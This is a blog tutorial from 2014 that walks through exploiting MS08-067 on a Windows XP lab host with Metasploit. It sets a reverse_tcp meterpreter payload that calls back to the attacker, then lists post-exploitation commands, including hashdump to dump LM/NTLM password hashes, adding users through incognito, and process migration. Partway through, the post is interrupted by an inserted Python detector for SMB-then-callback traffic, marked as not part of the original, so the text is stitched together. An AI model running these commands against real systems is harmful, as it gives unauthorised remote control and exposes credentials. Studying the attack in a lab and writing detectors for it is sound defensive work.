Thursday, May 29, 2014

Metasploit: Gaining Access using MS08-067 (CVE-2008-4250)

Setup details
Victim (Windows XP SP3): 192.168.56.101
Attacker (Kali Linux):   192.168.56.102

Use the commands below to launch an exploit.
search         search for the desired exploit, payload, etc.
use            select the required exploit
set            set options accordingly (LHOST, LPORT, RHOST, RPORT, PAYLOAD, etc.)
run/exploit    launch the exploit
meterpreter    shell to execute commands in the context of the victim
msf> search smb
msf> use exploit/windows/smb/ms08_067_netapi
msf> show options
msf> set RHOST 192.168.56.101
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> show options
msf> exploit

Check that all options for the exploit are set correctly (RHOST must be the victim, 192.168.56.101, not the attacker's address).
Launch the exploit once all the parameters are set properly.

The exploit is successful and we are already at the meterpreter prompt.
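As an added defender-side example (not part of the original post): a small Python detector over constructed connection-log lines that flags the network pattern this exploit path leaves behind, an inbound SMB (tcp/445) connection to a host followed shortly by that host connecting back to the same peer on another port, which is how a reverse_tcp handler receives its session. The log format, timestamps and addresses are constructed for the example; only the two lab IPs come from the post.

```python
"""Flag inbound-SMB-then-callback pairs in simple connection logs.

Constructed log format (not a real product's): ISO timestamp,src,dst,dport
"""
from datetime import datetime, timedelta

SMB_PORT = 445
WINDOW = timedelta(seconds=60)  # how soon after the SMB hit a callback must occur

# Constructed sample: benign SMB from a workstation, a DNS lookup, then the
# attacker (.102) hitting SMB on the victim (.101) and the victim calling back
# on 4444 (Metasploit's default LPORT; the detector does not depend on the port).
SAMPLE_LOG = [
    "2014-05-29T10:00:00,192.168.56.110,192.168.56.101,445",
    "2014-05-29T10:00:30,192.168.56.101,192.168.56.1,53",
    "2014-05-29T10:01:00,192.168.56.102,192.168.56.101,445",
    "2014-05-29T10:01:03,192.168.56.101,192.168.56.102,4444",
]


def parse(line):
    """Split one log line into (timestamp, src, dst, dport)."""
    ts, src, dst, dport = line.strip().split(",")
    return datetime.fromisoformat(ts), src, dst, int(dport)


def find_reverse_shell_candidates(lines, window=WINDOW):
    """Return alerts for hosts that receive SMB and then connect back to the
    same peer on a non-SMB port within `window`; normal file sharing does not
    produce this reversal of direction."""
    events = sorted(parse(l) for l in lines if l.strip())
    alerts = []
    for i, (ts, src, dst, dport) in enumerate(events):
        if dport != SMB_PORT:
            continue
        for ts2, src2, dst2, dport2 in events[i + 1:]:
            if ts2 - ts > window:
                break  # events are time-ordered, nothing later can match
            if src2 == dst and dst2 == src and dport2 != SMB_PORT:
                alerts.append({"victim": dst, "peer": src,
                               "callback_port": dport2,
                               "delay_s": (ts2 - ts).total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_reverse_shell_candidates(SAMPLE_LOG):
        print(alert)
```

On the sample data only the .102 -> .101 pair is reported; the workstation's SMB session and the DNS lookup are left alone.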

Details of the victim Operating System

Once we have access to the victim, there are many post-exploitation techniques such as privilege escalation, maintaining access, clearing logs, etc.
meterpreter> screenshot
meterpreter> migrate
To add users
meterpreter> use incognito
meterpreter> help incognito
Dump Users and LM/NTLM hashes
meterpreter> hashdump

The same steps can be followed for other exploits. To use a different exploit, execute the command below and set its options accordingly.
use exploit/windows/browser/ie_aurora

Other useful blogs
http://blog.disects.com/2014/04/hacking-android-devices-using.html
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html

Vulnerability details
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250